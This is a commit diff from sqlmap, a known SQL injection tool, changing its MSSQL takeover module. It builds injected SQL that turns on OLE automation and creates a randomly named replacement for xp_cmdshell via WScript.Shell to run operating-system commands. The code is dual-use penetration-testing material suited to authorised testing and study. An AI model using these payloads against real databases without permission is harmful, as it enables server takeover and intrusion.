more tweaking for issue #34, it's totally not as trivial as it may look (OPENROWSET has many limitations on MSSQL >= 2005)

2025-12-06 12:41:30 +00:00 · 2012-07-02 15:02:00 +01:00
parent b7d2680e55
commit 04d803c7fd
8 changed files with 52 additions and 39 deletions
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -5,6 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

+from lib.core.agent import agent
 from lib.core.common import Backend
 from lib.core.common import getSPQLSnippet
 from lib.core.common import hashDBWrite
@@ -40,26 +41,28 @@ class xp_cmdshell:
        if Backend.isVersionWithin(("2005", "2008")):
            logger.debug("activating sp_OACreate")

-            cmd += "EXEC master..sp_configure 'show advanced options', 1; "
-            cmd += "RECONFIGURE WITH OVERRIDE; "
-            cmd += "EXEC master..sp_configure 'ole automation procedures', 1; "
-            cmd += "RECONFIGURE WITH OVERRIDE; "
-            inject.goStacked(cmd)
+            cmd += "EXEC master..sp_configure 'show advanced options',1;"
+            cmd += "RECONFIGURE WITH OVERRIDE;"
+            cmd += "EXEC master..sp_configure 'ole automation procedures',1;"
+            cmd += "RECONFIGURE WITH OVERRIDE"
+            inject.goStacked(agent.runAsDBMSUser(cmd))

        self.__randStr = randomStr(lowercase=True)
+        self.__xpCmdshellNew = randomStr(lowercase=True)
+        self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew

-        cmd += "DECLARE @%s nvarchar(999); " % self.__randStr
+        cmd = "DECLARE @%s nvarchar(999);" % self.__randStr
        cmd += "set @%s='" % self.__randStr
-        cmd += "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int "
-        cmd += "EXEC sp_OACreate ''WScript.Shell'', @ID OUT "
-        cmd += "EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 "
-        cmd += "EXEC sp_OADestroy @ID'; "
-        cmd += "EXEC master..sp_executesql @%s;" % self.__randStr
+        cmd += "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int " % self.__xpCmdshellNew
+        cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT "
+        cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 "
+        cmd += "EXEC sp_OADestroy @ID';"
+        cmd += "EXEC master..sp_executesql @%s" % self.__randStr

        if Backend.isVersionWithin(("2005", "2008")):
-            cmd += " RECONFIGURE WITH OVERRIDE;"
+            cmd += ";RECONFIGURE WITH OVERRIDE"

-        inject.goStacked(cmd)
+        inject.goStacked(agent.runAsDBMSUser(cmd))

    def __xpCmdshellConfigure2005(self, mode):
        debugMsg = "configuring xp_cmdshell using sp_configure "
@@ -88,7 +91,7 @@ class xp_cmdshell:
        else:
            cmd = self.__xpCmdshellConfigure2000(mode)

-        inject.goStacked(cmd)
+        inject.goStacked(agent.runAsDBMSUser(cmd))

    def __xpCmdshellCheck(self):
        cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2)
@@ -153,7 +156,7 @@ class xp_cmdshell:
        self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
        self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)

-        return self.runAsDBMSUser(self.__forgedCmd)
+        return agent.runAsDBMSUser(self.__forgedCmd)

    def xpCmdshellExecCmd(self, cmd, silent=False):
        cmd = self.xpCmdshellForgeCmd(cmd)